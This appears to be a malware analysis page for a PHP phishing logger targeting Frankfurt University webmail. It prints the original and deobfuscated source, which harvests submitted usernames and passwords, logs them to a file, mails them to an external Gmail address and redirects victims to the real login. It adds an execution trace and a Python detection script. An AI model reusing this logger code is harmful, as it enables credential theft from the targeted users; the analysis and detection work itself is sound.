PHP Malware Analysis

log.php

md5: 31de5d0f718b5a0c57cb989faab49cf7


Deobfuscated PHP code

<?php

// Phishing credential logger: the victim POSTs a username and password to
// this page, the script records and mails them, then bounces the victim to
// the real webmail so the failure looks like a mistyped password.
$ip = getenv("REMOTE_ADDR");
// $message is never initialised; PHP treats it as an empty string (and
// emits an undefined-variable notice/warning).
$message .= "\n";
$message .= "Username\t: " . $_POST['username'] . "\n";
$message .= "Password\t: " . $_POST['password'] . "\n";
$message .= "\n";
$message .= "IP       : " . $ip . "\n";
$send = "sealion1414@gmail.com";
// Local copy of every capture, appended to a plain-text file in the script's
// own directory. The trace below places the script under /var/www/html/uploads/,
// i.e. inside the web root, so the log itself is exposed alongside it.
$fp = fopen("frankfurt.txt", "a");
fputs($fp, $message);
fclose($fp);
$subject = "mail.frankfurt-university.de - " . $_POST['username'] . "\n";
// $headers is assembled (with an unclosed From address and a literal "n"
// where a newline was intended) but never passed to mail(), so it has no effect.
$headers = "from: DE <noreply@frankfurt-university.de";
$headers .= $_POST['eMailAdd'] . "\n";
$headers .= "MIME-Version: 1.0n";
// Exfiltration to the operator's mailbox.
mail("sealion1414@gmail.com", "{$subject}", $message);
// Decoy redirect to the legitimate webmail login.
header("Location:  https://webmail.frankfurt-university.de/");
?>
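The sample above has the three-part shape of a credential logger: read credential fields from $_POST, ship them out (here by mail() and by appending to a local file), then redirect the victim to the genuine site. A legitimate login handler also reads $_POST and redirects, so the exfiltration channel is the indicator worth keying on. The script below is an added triage example for this page, not part of the sample and not a tool the page describes: it extracts indicators from PHP source with regular expressions (harvested request fields, e-mail addresses, files opened for writing, Location redirects) and applies that heuristic to the deobfuscated sample and to a constructed benign control. The control and the verdict strings are the example's own assumptions.

```python
"""Static triage of a PHP credential-phishing logger (added example).

Not part of the analysed sample or of any tool the page describes. Pulls
indicators out of PHP source and classifies it: credential-like $_POST
fields plus an exfiltration channel (mail() or an append/write-mode fopen)
means credential logger; a Location redirect on top is the decoy pattern.
"""
import re
from dataclasses import dataclass, field

# The deobfuscated sample from this page, embedded so the example runs offline.
SAMPLE = r'''<?php
$ip = getenv("REMOTE_ADDR");
$message .= "\n";
$message .= "Username\t: " . $_POST['username'] . "\n";
$message .= "Password\t: " . $_POST['password'] . "\n";
$message .= "\n";
$message .= "IP       : " . $ip . "\n";
$send = "sealion1414@gmail.com";
$fp = fopen("frankfurt.txt", "a");
fputs($fp, $message);
fclose($fp);
$subject = "mail.frankfurt-university.de - " . $_POST['username'] . "\n";
$headers = "from: DE <noreply@frankfurt-university.de";
$headers .= $_POST['eMailAdd'] . "\n";
$headers .= "MIME-Version: 1.0n";
mail("sealion1414@gmail.com", "{$subject}", $message);
header("Location:  https://webmail.frankfurt-university.de/");
?>'''

# Constructed control (not from the page): a login handler that verifies a
# hash and redirects, but never mails or logs the submitted credentials.
BENIGN = r'''<?php
session_start();
if (password_verify($_POST['password'], $stored_hash)) {
    $_SESSION['user'] = $_POST['username'];
    header("Location: /home.php");
}
?>'''

POST_RE = re.compile(r"\$_(?:POST|REQUEST|GET)\[\s*['\"]([^'\"]+)['\"]\s*\]")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# fopen(<literal path>, "a" | "a+" | "w" | "w+"): the script writes a local file.
FOPEN_RE = re.compile(r"fopen\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"][aw]\+?['\"]")
LOCATION_RE = re.compile(r"header\(\s*['\"]Location:\s*([^'\"]+?)\s*['\"]")
MAIL_RE = re.compile(r"\bmail\s*\(")
# Request-field names that suggest credentials are being collected.
CRED_WORDS = ("pass", "pwd", "user", "login", "email")


@dataclass
class Triage:
    post_fields: list
    emails: list
    written_files: list
    redirects: list
    indicators: list = field(default_factory=list)
    verdict: str = "no credential exfiltration"


def triage(src: str) -> Triage:
    """Extract indicators from PHP source and classify it."""
    t = Triage(
        post_fields=sorted(set(POST_RE.findall(src))),
        emails=sorted(set(EMAIL_RE.findall(src))),
        written_files=sorted(set(FOPEN_RE.findall(src))),
        redirects=sorted(set(LOCATION_RE.findall(src))),
    )
    harvests = any(w in f.lower() for f in t.post_fields for w in CRED_WORDS)
    mails = bool(MAIL_RE.search(src))
    if harvests:
        t.indicators.append("reads credential-like request fields: " + ", ".join(t.post_fields))
    if mails:
        t.indicators.append("calls mail(); addresses in source: " + ", ".join(t.emails))
    if t.written_files:
        t.indicators.append("writes/appends local file(s): " + ", ".join(t.written_files))
    if t.redirects:
        t.indicators.append("redirects the client to " + ", ".join(t.redirects))
    # The exfiltration channel, not the $_POST read or the redirect, is decisive.
    if harvests and (mails or t.written_files):
        t.verdict = "credential logger" + (" with decoy redirect" if t.redirects else "")
    return t


if __name__ == "__main__":
    for name, src in (("log.php (sample)", SAMPLE), ("constructed control", BENIGN)):
        result = triage(src)
        print(f"{name}: {result.verdict}")
        for ind in result.indicators:
            print("  -", ind)
```

Run against the sample it reports a credential logger with decoy redirect and lists sealion1414@gmail.com, frankfurt.txt and the webmail URL as indicators; the control, which reads the same two POST fields and also redirects, is not flagged because it has no outbound channel. The regular expressions only catch literal string arguments, so a kit that builds the mail address or file name from concatenated pieces (as the $send variable hints this one could have) needs the deobfuscation step first.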
 

Execution traces

data/traces/31de5d0f718b5a0c57cb989faab49cf7_trace-1676245085.677.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:38:31.574778]
1	0	1	0.000156	393512
1	3	0	0.000199	393800	{main}	1		/var/www/html/uploads/log.php	0	0
1	3	1	0.000216	393800
			0.000242	314224
TRACE END   [2023-02-12 21:38:31.574897]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?
$ip = getenv("REMOTE_ADDR");
$message .= "\n";
$message .= "Username	: ".$_POST['username']."\n";
$message .= "Password	: ".$_POST['password']."\n";
$message .= "\n";
$message .= "IP       : ".$ip."\n";
$send = "sealion1414@gmail.com";
$fp = fopen("frankfurt.txt","a");
fputs($fp,$message);
fclose($fp);
$subject = "mail.frankfurt-university.de - ".$_POST['username']."\n";
$headers = "from: DE <noreply@frankfurt-university.de";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0n";
mail("$send", "$subject", $message); 
header("Location:  https://webmail.frankfurt-university.de/");	  

?>